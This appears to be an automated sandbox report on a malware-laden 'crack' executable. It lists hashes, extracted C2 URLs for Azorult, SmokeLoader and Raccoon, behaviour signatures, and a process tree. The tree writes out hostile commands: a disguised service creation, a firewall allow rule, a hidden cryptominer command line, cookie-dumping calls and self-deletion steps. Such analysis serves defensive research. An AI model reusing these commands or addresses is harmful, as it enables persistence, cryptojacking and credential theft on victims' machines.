Analysis

  • max time kernel
    143s
  • max time network
    175s
  • platform
    windows10_x64
  • resource
    win10v20201028
  • submitted
    13-02-2021 10:43

Errors

Reason
Machine shutdown

General

  • Target

    InterVations_RegCOPA_v1_crack.exe

  • Size

    9.0MB

  • MD5

    3ab10d617e0172bf28cd6ff364ed6507

  • SHA1

    eddfc06d2c01acaad2d96bad0f8072c271ad5c9b

  • SHA256

    d4b15a9eadea615530d8202f77fc2179e0dcafc375c72890be97e71ec06b58db

  • SHA512

    34beb85c3138f4eb6efbbb3278540fcb7b34b6797be1d4258af2c48f1e0ee6fb934f82d90d48444a0354e3e28a1208cebd9327162e0390b3fe8897ad20acfadc

Malware Config

Extracted

Family

azorult

C2

http://kvaka.li/1210776429.php

Extracted

Family

smokeloader

Version

2020

C2

http://naritouzina.net/

http://nukaraguasleep.net/

http://notfortuaj.net/

http://natuturalistic.net/

http://zaniolofusa.net/

http://4zavr.com/upload/

http://zynds.com/upload/

http://atvua.com/upload/

http://detse.net/upload/

http://dsdett.com/upload/

http://dtabasee.com/upload/

http://yeronogles.monster/upload/

rc4.i32
rc4.i32

Extracted

Family

raccoon

Botnet

17694a35d42ac97e2cd3ebd196db01b372cce1b0

Attributes
  • url4cnc

    https://telete.in/o23felk0s

rc4.plain
rc4.plain

Extracted

Family

smokeloader

Version

2019

C2

http://10022020newfolder1002002131-service1002.space/

http://10022020newfolder1002002231-service1002.space/

http://10022020newfolder3100231-service1002.space/

http://10022020newfolder1002002431-service1002.space/

http://10022020newfolder1002002531-service1002.space/

http://10022020newfolder33417-01242510022020.space/

http://10022020test125831-service1002012510022020.space/

http://10022020test136831-service1002012510022020.space/

http://10022020test147831-service1002012510022020.space/

http://10022020test146831-service1002012510022020.space/

http://10022020test134831-service1002012510022020.space/

http://10022020est213531-service100201242510022020.ru/

http://10022020yes1t3481-service1002012510022020.ru/

http://10022020test13561-service1002012510022020.su/

http://10022020test14781-service1002012510022020.info/

http://10022020test13461-service1002012510022020.net/

http://10022020test15671-service1002012510022020.tech/

http://10022020test12671-service1002012510022020.online/

http://10022020utest1341-service1002012510022020.ru/

http://10022020uest71-service100201dom2510022020.ru/

rc4.i32
rc4.i32

Extracted

Family

raccoon

Botnet

027bc1bb9168079d5f7473eee9c05ee06589c305

Attributes
  • url4cnc

    https://telete.in/jjbadb0y

rc4.plain
rc4.plain

Extracted

Family

metasploit

Version

windows/single_exec

Extracted

Family

raccoon

Botnet

9ba64f4b6fe448911470a88f09d6e7d5b92ff0ab

Attributes
  • url4cnc

    https://telete.in/jagressor_kz

rc4.plain
rc4.plain

Signatures

  • Azorult

    An information stealer that was first discovered in 2016, targeting browsing history and passwords.

  • Glupteba

    Glupteba is a modular loader written in Golang with various components.

  • Glupteba Payload 3 IoCs
  • MetaSploit

    Detected malicious payload which is part of the Metasploit Framework, likely generated with msfvenom or similar.

  • PlugX

    PlugX is a RAT (Remote Access Trojan) that has been around since 2008.

  • Raccoon

    Simple but powerful infostealer which was very active in 2019.

  • RedLine

    RedLine Stealer is a malware family written in C#, first appearing in early 2020.

  • RedLine Payload 2 IoCs
  • SmokeLoader

    Modular backdoor trojan in use since 2014.

  • Suspicious use of NtCreateUserProcessOtherParentProcess 4 IoCs
  • Tofsee

    Backdoor/botnet which carries out malicious activities based on commands from a C2 server.

  • Vidar

    Vidar is an infostealer based on Arkei stealer.

  • Windows security bypass 2 TTPs
  • xmrig

    XMRig is a high performance, open source, cross platform CPU/GPU miner.

  • Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs
  • Modifies boot configuration data using bcdedit 15 IoCs
  • Nirsoft 6 IoCs
  • XMRig Miner Payload 1 IoCs
  • Creates new service(s) 1 TTPs
  • Executes dropped EXE 54 IoCs
  • Modifies Windows Firewall 1 TTPs
  • Possible attempt to disable PatchGuard 2 TTPs

    Rootkits can use kernel patching to embed themselves in an operating system.

  • Sets service image path in registry 2 TTPs
  • Suspicious Office macro 1 IoCs

    Office document equipped with 4.0 macros.

  • UPX packed file 5 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • VMProtect packed file 1 IoCs

    Detects executables packed with VMProtect commercial packer.

  • Checks BIOS information in registry 2 TTPs 2 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Loads dropped DLL 28 IoCs
  • Modifies file permissions 1 TTPs 1 IoCs
  • Reads user/profile data of local email clients 2 TTPs

    Email clients store some user data on disk where infostealers will often target it.

  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Windows security modification 2 TTPs 10 IoCs
  • themida 2 IoCs

    Detects Themida, Advanced Windows software protection system.

  • Accesses 2FA software files, possible credential harvesting 2 TTPs
  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Adds Run key to start application 2 TTPs 4 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Checks whether UAC is enabled 1 TTPs 6 IoCs
  • Enumerates connected drives 3 TTPs 48 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Legitimate hosting services abused for malware hosting/C2 1 TTPs
  • Looks up external IP address via web service 5 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Writes to the Master Boot Record (MBR) 1 TTPs 4 IoCs

    Bootkits write to the MBR to gain persistence at a level below the operating system.

  • Drops file in System32 directory 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
  • Suspicious use of SetThreadContext 6 IoCs
  • Drops file in Program Files directory 51 IoCs
  • Drops file in Windows directory 12 IoCs
  • Launches sc.exe

    Sc.exe is a Windows utlilty to control services on the system.

  • Program crash 4 IoCs
  • Checks SCSI registry key(s) 3 TTPs 64 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Checks processor information in registry 2 TTPs 6 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Creates scheduled task(s) 1 TTPs 2 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Delays execution with timeout.exe 2 IoCs
  • Kills process with taskkill 3 IoCs
  • Modifies Control Panel 1 IoCs
  • Modifies Internet Explorer settings 1 TTPs 3 IoCs
  • Modifies data under HKEY_USERS 64 IoCs
  • Modifies registry class 64 IoCs
  • Modifies system certificate store 2 TTPs 2 IoCs
  • Runs ping.exe 1 TTPs 5 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 2 IoCs
  • Suspicious behavior: MapViewOfSection 4 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 3 IoCs
  • Suspicious use of SetWindowsHookEx 17 IoCs
  • Suspicious use of UnmapMainImage 1 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\InterVations_RegCOPA_v1_crack.exe
    "C:\Users\Admin\AppData\Local\Temp\InterVations_RegCOPA_v1_crack.exe"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:508
    • C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen.bat" "
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:2824
      • C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-pr.exe
        keygen-pr.exe -p83fsase3Ge
        3⤵
        • Executes dropped EXE
        • Suspicious use of WriteProcessMemory
        PID:3612
        • C:\Users\Admin\AppData\Local\Temp\RarSFX2\key.exe
          "C:\Users\Admin\AppData\Local\Temp\RarSFX2\key.exe"
          4⤵
          • Executes dropped EXE
          • Suspicious use of WriteProcessMemory
          PID:2192
          • C:\Users\Admin\AppData\Local\Temp\RarSFX2\key.exe
            C:\Users\Admin\AppData\Local\Temp\RarSFX2\key.exe -txt -scanlocal -file:potato.dat
            5⤵
              PID:3900
        • C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-1.exe
          keygen-step-1.exe
          3⤵
          • Executes dropped EXE
          PID:2896
        • C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-3.exe
          keygen-step-3.exe
          3⤵
          • Executes dropped EXE
          • Suspicious use of WriteProcessMemory
          PID:1920
          • C:\Windows\SysWOW64\cmd.exe
            cmd.exe /C ping 1.1.1.1 -n 1 -w 3000 > Nul & Del /f /q "C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-3.exe"
            4⤵
            • Suspicious use of WriteProcessMemory
            PID:2344
            • C:\Windows\SysWOW64\PING.EXE
              ping 1.1.1.1 -n 1 -w 3000
              5⤵
              • Runs ping.exe
              PID:2464
        • C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-4.exe
          keygen-step-4.exe
          3⤵
          • Executes dropped EXE
          • Suspicious use of WriteProcessMemory
          PID:2600
          • C:\Users\Admin\AppData\Local\Temp\RarSFX1\Setup.exe
            "C:\Users\Admin\AppData\Local\Temp\RarSFX1\Setup.exe"
            4⤵
            • Executes dropped EXE
            • Checks whether UAC is enabled
            • Writes to the Master Boot Record (MBR)
            • Suspicious use of NtSetInformationThreadHideFromDebugger
            • Modifies system certificate store
            • Suspicious use of SetWindowsHookEx
            • Suspicious use of WriteProcessMemory
            PID:4012
            • C:\Windows\SysWOW64\msiexec.exe
              msiexec.exe /i "C:\Users\Admin\AppData\Local\Temp\gdiview.msi"
              5⤵
              • Enumerates connected drives
              • Suspicious use of AdjustPrivilegeToken
              • Suspicious use of FindShellTrayWindow
              PID:4076
            • C:\Users\Admin\AppData\Local\Temp\6489A2274AE24900.exe
              C:\Users\Admin\AppData\Local\Temp\6489A2274AE24900.exe 0011 installp1
              5⤵
              • Executes dropped EXE
              • Loads dropped DLL
              • Checks whether UAC is enabled
              • Writes to the Master Boot Record (MBR)
              • Suspicious use of SetThreadContext
              • Checks SCSI registry key(s)
              • Suspicious use of SetWindowsHookEx
              • Suspicious use of WriteProcessMemory
              PID:3960
              • C:\Program Files\Mozilla Firefox\firefox.exe
                "C:\Program Files\Mozilla Firefox\firefox.exe"
                6⤵
                • Suspicious use of SetWindowsHookEx
                PID:4524
              • C:\Users\Admin\AppData\Roaming\1613216862070.exe
                "C:\Users\Admin\AppData\Roaming\1613216862070.exe" /sjson "C:\Users\Admin\AppData\Roaming\1613216862070.txt"
                6⤵
                • Executes dropped EXE
                • Suspicious behavior: EnumeratesProcesses
                • Suspicious use of SetWindowsHookEx
                PID:4828
              • C:\Program Files\Mozilla Firefox\firefox.exe
                "C:\Program Files\Mozilla Firefox\firefox.exe"
                6⤵
                • Suspicious use of SetWindowsHookEx
                PID:4980
              • C:\Users\Admin\AppData\Roaming\1613216866773.exe
                "C:\Users\Admin\AppData\Roaming\1613216866773.exe" /sjson "C:\Users\Admin\AppData\Roaming\1613216866773.txt"
                6⤵
                • Executes dropped EXE
                • Suspicious behavior: EnumeratesProcesses
                • Suspicious use of SetWindowsHookEx
                PID:4996
              • C:\Program Files\Mozilla Firefox\firefox.exe
                "C:\Program Files\Mozilla Firefox\firefox.exe"
                6⤵
                • Suspicious use of SetWindowsHookEx
                PID:5048
              • C:\Users\Admin\AppData\Roaming\1613216872148.exe
                "C:\Users\Admin\AppData\Roaming\1613216872148.exe" /sjson "C:\Users\Admin\AppData\Roaming\1613216872148.txt"
                6⤵
                • Executes dropped EXE
                • Suspicious behavior: EnumeratesProcesses
                • Suspicious use of SetWindowsHookEx
                PID:5060
              • C:\Users\Admin\AppData\Local\Temp\download\ThunderFW.exe
                C:\Users\Admin\AppData\Local\Temp\download\ThunderFW.exe ThunderFW "C:\Users\Admin\AppData\Local\Temp\download\MiniThunderPlatform.exe"
                6⤵
                • Executes dropped EXE
                • Suspicious use of SetWindowsHookEx
                PID:4608
              • C:\Users\Admin\AppData\Local\Temp\download\MiniThunderPlatform.exe
                "C:\Users\Admin\AppData\Local\Temp\download\MiniThunderPlatform.exe" -StartTP
                6⤵
                • Executes dropped EXE
                • Loads dropped DLL
                • Writes to the Master Boot Record (MBR)
                • Suspicious use of SetWindowsHookEx
                PID:3628
              • C:\Users\Admin\AppData\Local\Temp\23E04C4F32EF2158.exe
                C:\Users\Admin\AppData\Local\Temp\23E04C4F32EF2158.exe /silent
                6⤵
                • Executes dropped EXE
                • Suspicious use of SetWindowsHookEx
                PID:496
                • C:\Users\Admin\AppData\Local\Temp\is-QTPKC.tmp\23E04C4F32EF2158.tmp
                  "C:\Users\Admin\AppData\Local\Temp\is-QTPKC.tmp\23E04C4F32EF2158.tmp" /SL5="$70242,815708,121344,C:\Users\Admin\AppData\Local\Temp\23E04C4F32EF2158.exe" /silent
                  7⤵
                  • Executes dropped EXE
                  • Drops file in Program Files directory
                  • Suspicious behavior: EnumeratesProcesses
                  • Suspicious use of FindShellTrayWindow
                  • Suspicious use of SetWindowsHookEx
                  PID:4956
                  • C:\Program Files (x86)\HappyNewYear\seed.sfx.exe
                    "C:\Program Files (x86)\HappyNewYear\seed.sfx.exe" -pX7mdks39WE0 -s1
                    8⤵
                    • Executes dropped EXE
                    • Drops file in Program Files directory
                    • Suspicious use of SetWindowsHookEx
                    PID:4940
                    • C:\Program Files (x86)\Seed Trade\Seed\seed.exe
                      "C:\Program Files (x86)\Seed Trade\Seed\seed.exe"
                      9⤵
                      • Executes dropped EXE
                      • Loads dropped DLL
                      • Checks SCSI registry key(s)
                      • Suspicious behavior: EnumeratesProcesses
                      • Suspicious behavior: MapViewOfSection
                      PID:4300
                  • C:\Windows\SysWOW64\cmd.exe
                    "cmd.exe" /c "start https://iplogger.org/14Zhe7"
                    8⤵
                    • Checks computer location settings
                    PID:2636
              • C:\Windows\SysWOW64\cmd.exe
                cmd /c ping 127.0.0.1 -n 3 & del "C:\Users\Admin\AppData\Local\Temp\6489A2274AE24900.exe"
                6⤵
                  PID:4548
                  • C:\Windows\SysWOW64\PING.EXE
                    ping 127.0.0.1 -n 3
                    7⤵
                    • Runs ping.exe
                    PID:5012
              • C:\Users\Admin\AppData\Local\Temp\6489A2274AE24900.exe
                C:\Users\Admin\AppData\Local\Temp\6489A2274AE24900.exe 200 installp1
                5⤵
                • Executes dropped EXE
                • Checks whether UAC is enabled
                • Writes to the Master Boot Record (MBR)
                • Checks SCSI registry key(s)
                • Suspicious use of SetWindowsHookEx
                • Suspicious use of WriteProcessMemory
                PID:632
                • C:\Windows\SysWOW64\cmd.exe
                  cmd.exe /c taskkill /f /im chrome.exe
                  6⤵
                  • Suspicious use of WriteProcessMemory
                  PID:4532
                  • C:\Windows\SysWOW64\taskkill.exe
                    taskkill /f /im chrome.exe
                    7⤵
                    • Kills process with taskkill
                    PID:4680
                • C:\Windows\SysWOW64\cmd.exe
                  cmd /c ping 127.0.0.1 -n 3 & del "C:\Users\Admin\AppData\Local\Temp\6489A2274AE24900.exe"
                  6⤵
                    PID:4904
                    • C:\Windows\SysWOW64\PING.EXE
                      ping 127.0.0.1 -n 3
                      7⤵
                      • Runs ping.exe
                      PID:4948
                • C:\Windows\SysWOW64\cmd.exe
                  cmd /c ping 127.0.0.1 -n 3 & del "C:\Users\Admin\AppData\Local\Temp\RarSFX1\Setup.exe"
                  5⤵
                  • Suspicious use of WriteProcessMemory
                  PID:2460
                  • C:\Windows\SysWOW64\PING.EXE
                    ping 127.0.0.1 -n 3
                    6⤵
                    • Runs ping.exe
                    PID:2616
              • C:\Users\Admin\AppData\Local\Temp\RarSFX1\md2_2efs.exe
                "C:\Users\Admin\AppData\Local\Temp\RarSFX1\md2_2efs.exe"
                4⤵
                • Executes dropped EXE
                • Checks whether UAC is enabled
                PID:4004
                • C:\Windows\SysWOW64\WerFault.exe
                  C:\Windows\SysWOW64\WerFault.exe -u -p 4004 -s 4916
                  5⤵
                  • Drops file in Windows directory
                  • Program crash
                  • Suspicious behavior: EnumeratesProcesses
                  PID:4792
              • C:\Users\Admin\AppData\Local\Temp\RarSFX1\file.exe
                "C:\Users\Admin\AppData\Local\Temp\RarSFX1\file.exe"
                4⤵
                • Executes dropped EXE
                • Modifies data under HKEY_USERS
                PID:1896
                • C:\Users\Admin\AppData\Roaming\D533.tmp.exe
                  "C:\Users\Admin\AppData\Roaming\D533.tmp.exe"
                  5⤵
                  • Executes dropped EXE
                  • Suspicious use of SetThreadContext
                  PID:4768
                  • C:\Users\Admin\AppData\Roaming\D533.tmp.exe
                    "C:\Users\Admin\AppData\Roaming\D533.tmp.exe"
                    6⤵
                    • Executes dropped EXE
                    • Checks processor information in registry
                    PID:4196
                • C:\Windows\SysWOW64\cmd.exe
                  "C:\Windows\system32\cmd.exe" /c ping 127.0.0.1 && del "C:\Users\Admin\AppData\Local\Temp\RarSFX1\file.exe"
                  5⤵
                    PID:3392
                    • C:\Windows\SysWOW64\PING.EXE
                      ping 127.0.0.1
                      6⤵
                      • Runs ping.exe
                      PID:5124
                • C:\Users\Admin\AppData\Local\Temp\RarSFX1\BTRSetp.exe
                  "C:\Users\Admin\AppData\Local\Temp\RarSFX1\BTRSetp.exe"
                  4⤵
                  • Executes dropped EXE
                  PID:4716
                  • C:\Users\Admin\AppData\Local\Temp\RarSFX3\installer.exe
                    "C:\Users\Admin\AppData\Local\Temp\RarSFX3\installer.exe"
                    5⤵
                    • Executes dropped EXE
                    PID:5140
                    • C:\ProgramData\4506567.49
                      "C:\ProgramData\4506567.49"
                      6⤵
                      • Executes dropped EXE
                      PID:5684
                      • C:\Windows\SysWOW64\WerFault.exe
                        C:\Windows\SysWOW64\WerFault.exe -u -p 5684 -s 724
                        7⤵
                        • Program crash
                        PID:5840
                    • C:\ProgramData\3535996.38
                      "C:\ProgramData\3535996.38"
                      6⤵
                      • Executes dropped EXE
                      • Checks BIOS information in registry
                      • Checks whether UAC is enabled
                      • Suspicious use of NtSetInformationThreadHideFromDebugger
                      PID:5876
                    • C:\ProgramData\181082.1
                      "C:\ProgramData\181082.1"
                      6⤵
                      • Executes dropped EXE
                      • Adds Run key to start application
                      PID:5740
                      • C:\ProgramData\Windows Host\Windows Host.exe
                        "C:\ProgramData\Windows Host\Windows Host.exe"
                        7⤵
                        • Executes dropped EXE
                        PID:6040
                • C:\Users\Admin\AppData\Local\Temp\RarSFX1\gdrrr.exe
                  "C:\Users\Admin\AppData\Local\Temp\RarSFX1\gdrrr.exe"
                  4⤵
                  • Executes dropped EXE
                  • Adds Run key to start application
                  PID:6120
                  • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                    C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                    5⤵
                    • Executes dropped EXE
                    PID:4884
                  • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                    C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                    5⤵
                    • Executes dropped EXE
                    PID:5824
          • C:\Windows\system32\msiexec.exe
            C:\Windows\system32\msiexec.exe /V
            1⤵
            • Enumerates connected drives
            • Drops file in Program Files directory
            • Drops file in Windows directory
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            • Suspicious use of WriteProcessMemory
            PID:4028
            • C:\Windows\syswow64\MsiExec.exe
              C:\Windows\syswow64\MsiExec.exe -Embedding 753A7B5478F73F0A19931D7F468D952E C
              2⤵
              • Loads dropped DLL
              PID:1168
            • C:\Windows\system32\srtasks.exe
              C:\Windows\system32\srtasks.exe ExecuteScopeRestorePoint /WaitForRestorePoint:2
              2⤵
                PID:4236
            • C:\Windows\system32\vssvc.exe
              C:\Windows\system32\vssvc.exe
              1⤵
                PID:1816
              • \??\c:\windows\system32\svchost.exe
                c:\windows\system32\svchost.exe -k netsvcs -s DsmSvc
                1⤵
                • Checks SCSI registry key(s)
                • Modifies data under HKEY_USERS
                PID:4116
              • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe
                "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca
                1⤵
                • Drops file in Windows directory
                • Modifies Control Panel
                • Modifies Internet Explorer settings
                • Modifies registry class
                • Suspicious use of SetWindowsHookEx
                PID:3780
              • C:\Windows\system32\browser_broker.exe
                C:\Windows\system32\browser_broker.exe -Embedding
                1⤵
                • Modifies Internet Explorer settings
                PID:3268
              • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                1⤵
                • Modifies registry class
                • Suspicious behavior: MapViewOfSection
                • Suspicious use of SetWindowsHookEx
                PID:3140
              • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                1⤵
                • Modifies Internet Explorer settings
                • Modifies registry class
                PID:4652
              • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                1⤵
                • Modifies registry class
                PID:5072
              • C:\Users\Admin\AppData\Local\Temp\D68B.exe
                C:\Users\Admin\AppData\Local\Temp\D68B.exe
                1⤵
                • Executes dropped EXE
                • Adds Run key to start application
                PID:4252
                • C:\Windows\SysWOW64\icacls.exe
                  icacls "C:\Users\Admin\AppData\Local\f9b8b519-7900-4e55-b4ae-15b25ec55bb0" /deny *S-1-1-0:(OI)(CI)(DE,DC)
                  2⤵
                  • Modifies file permissions
                  PID:4712
                • C:\Users\Admin\AppData\Local\Temp\D68B.exe
                  "C:\Users\Admin\AppData\Local\Temp\D68B.exe" --Admin IsNotAutoStart IsNotTask
                  2⤵
                  • Executes dropped EXE
                  PID:1012
                  • C:\Users\Admin\AppData\Local\8f1cad46-ab54-4499-8fd6-f133a8a79b7c\updatewin1.exe
                    "C:\Users\Admin\AppData\Local\8f1cad46-ab54-4499-8fd6-f133a8a79b7c\updatewin1.exe"
                    3⤵
                    • Executes dropped EXE
                    PID:5400
                  • C:\Users\Admin\AppData\Local\8f1cad46-ab54-4499-8fd6-f133a8a79b7c\updatewin2.exe
                    "C:\Users\Admin\AppData\Local\8f1cad46-ab54-4499-8fd6-f133a8a79b7c\updatewin2.exe"
                    3⤵
                    • Executes dropped EXE
                    PID:5504
                  • C:\Users\Admin\AppData\Local\8f1cad46-ab54-4499-8fd6-f133a8a79b7c\updatewin.exe
                    "C:\Users\Admin\AppData\Local\8f1cad46-ab54-4499-8fd6-f133a8a79b7c\updatewin.exe"
                    3⤵
                    • Executes dropped EXE
                    PID:5700
                    • C:\Windows\SysWOW64\cmd.exe
                      /c timeout /t 3 & del /f /q C:\Users\Admin\AppData\Local\8f1cad46-ab54-4499-8fd6-f133a8a79b7c\updatewin.exe
                      4⤵
                        PID:4120
                        • C:\Windows\SysWOW64\timeout.exe
                          timeout /t 3
                          5⤵
                          • Delays execution with timeout.exe
                          PID:4280
                    • C:\Users\Admin\AppData\Local\8f1cad46-ab54-4499-8fd6-f133a8a79b7c\5.exe
                      "C:\Users\Admin\AppData\Local\8f1cad46-ab54-4499-8fd6-f133a8a79b7c\5.exe"
                      3⤵
                      • Executes dropped EXE
                      • Loads dropped DLL
                      • Checks processor information in registry
                      PID:5940
                      • C:\Windows\SysWOW64\cmd.exe
                        "C:\Windows\System32\cmd.exe" /c taskkill /im 5.exe /f & erase C:\Users\Admin\AppData\Local\8f1cad46-ab54-4499-8fd6-f133a8a79b7c\5.exe & exit
                        4⤵
                          PID:5192
                          • C:\Windows\SysWOW64\taskkill.exe
                            taskkill /im 5.exe /f
                            5⤵
                            • Kills process with taskkill
                            PID:5540
                  • C:\Windows\system32\compattelrunner.exe
                    C:\Windows\system32\compattelrunner.exe -m:aeinv.dll -f:UpdateSoftwareInventoryW
                    1⤵
                      PID:4112
                    • C:\Users\Admin\AppData\Local\Temp\DBCB.exe
                      C:\Users\Admin\AppData\Local\Temp\DBCB.exe
                      1⤵
                      • Executes dropped EXE
                      • Loads dropped DLL
                      • Checks processor information in registry
                      PID:3228
                      • C:\Windows\SysWOW64\cmd.exe
                        "C:\Windows\System32\cmd.exe" /c taskkill /im DBCB.exe /f & erase C:\Users\Admin\AppData\Local\Temp\DBCB.exe & exit
                        2⤵
                          PID:5232
                          • C:\Windows\SysWOW64\taskkill.exe
                            taskkill /im DBCB.exe /f
                            3⤵
                            • Kills process with taskkill
                            PID:5332
                      • C:\Users\Admin\AppData\Local\Temp\DE9B.exe
                        C:\Users\Admin\AppData\Local\Temp\DE9B.exe
                        1⤵
                        • Executes dropped EXE
                        • Loads dropped DLL
                        PID:4516
                        • C:\Windows\SysWOW64\cmd.exe
                          cmd.exe /C timeout /T 10 /NOBREAK > Nul & Del /f /q "C:\Users\Admin\AppData\Local\Temp\DE9B.exe"
                          2⤵
                            PID:4208
                            • C:\Windows\SysWOW64\timeout.exe
                              timeout /T 10 /NOBREAK
                              3⤵
                              • Delays execution with timeout.exe
                              PID:1228
                        • C:\Users\Admin\AppData\Local\Temp\E572.exe
                          C:\Users\Admin\AppData\Local\Temp\E572.exe
                          1⤵
                          • Executes dropped EXE
                          PID:640
                        • C:\Program Files (x86)\gdiview\gdiview\GDIView.exe
                          "C:\Program Files (x86)\gdiview\gdiview\GDIView.exe"
                          1⤵
                          • Executes dropped EXE
                          • Suspicious behavior: GetForegroundWindowSpam
                          PID:4232
                        • C:\Users\Admin\AppData\Local\Temp\EB9D.exe
                          C:\Users\Admin\AppData\Local\Temp\EB9D.exe
                          1⤵
                          • Executes dropped EXE
                          PID:4512
                          • C:\Windows\SysWOW64\cmd.exe
                            "C:\Windows\System32\cmd.exe" /C mkdir C:\Windows\SysWOW64\vdduqhbu\
                            2⤵
                              PID:3328
                            • C:\Windows\SysWOW64\cmd.exe
                              "C:\Windows\System32\cmd.exe" /C move /Y "C:\Users\Admin\AppData\Local\Temp\gsrfqaic.exe" C:\Windows\SysWOW64\vdduqhbu\
                              2⤵
                                PID:5272
                              • C:\Windows\SysWOW64\sc.exe
                                "C:\Windows\System32\sc.exe" create vdduqhbu binPath= "C:\Windows\SysWOW64\vdduqhbu\gsrfqaic.exe /d\"C:\Users\Admin\AppData\Local\Temp\EB9D.exe\"" type= own start= auto DisplayName= "wifi support"
                                2⤵
                                  PID:5352
                                • C:\Windows\SysWOW64\sc.exe
                                  "C:\Windows\System32\sc.exe" description vdduqhbu "wifi internet conection"
                                  2⤵
                                    PID:5440
                                  • C:\Windows\SysWOW64\sc.exe
                                    "C:\Windows\System32\sc.exe" start vdduqhbu
                                    2⤵
                                      PID:5516
                                    • C:\Windows\SysWOW64\netsh.exe
                                      "C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="Host-process for services of Windows" dir=in action=allow program="C:\Windows\SysWOW64\svchost.exe" enable=yes>nul
                                      2⤵
                                        PID:5652
                                    • C:\Users\Admin\AppData\Local\Temp\F504.exe
                                      C:\Users\Admin\AppData\Local\Temp\F504.exe
                                      1⤵
                                      • Executes dropped EXE
                                      • Loads dropped DLL
                                      • Checks SCSI registry key(s)
                                      • Suspicious behavior: MapViewOfSection
                                      PID:5228
                                    • C:\Windows\SysWOW64\vdduqhbu\gsrfqaic.exe
                                      C:\Windows\SysWOW64\vdduqhbu\gsrfqaic.exe /d"C:\Users\Admin\AppData\Local\Temp\EB9D.exe"
                                      1⤵
                                      • Executes dropped EXE
                                      • Suspicious use of SetThreadContext
                                      PID:5616
                                      • C:\Windows\SysWOW64\svchost.exe
                                        svchost.exe
                                        2⤵
                                        • Drops file in System32 directory
                                        PID:6104
                                        • C:\Windows\SysWOW64\svchost.exe
                                          svchost.exe -o msr.pool-pay.com:6199 -u 9jNvTpsSutBLodbiiRngN2S4AfM84WJ4Y8zRpo6H4QPBK625huByLqkiCTh5Uog1qHVBr7cyZfbA1GiiPqSsSv83HAiirSf.50000 -p x -k
                                          3⤵
                                            PID:1008
                                      • C:\Users\Admin\AppData\Local\Temp\2A2.exe
                                        C:\Users\Admin\AppData\Local\Temp\2A2.exe
                                        1⤵
                                        • Executes dropped EXE
                                        • Checks whether UAC is enabled
                                        PID:5772
                                        • C:\Windows\SysWOW64\WerFault.exe
                                          C:\Windows\SysWOW64\WerFault.exe -u -p 5772 -s 2460
                                          2⤵
                                          • Program crash
                                          PID:6008
                                      • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                        "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                        1⤵
                                        • Modifies registry class
                                        PID:5188
                                      • C:\Users\Admin\AppData\Local\Temp\14C3.exe
                                        C:\Users\Admin\AppData\Local\Temp\14C3.exe
                                        1⤵
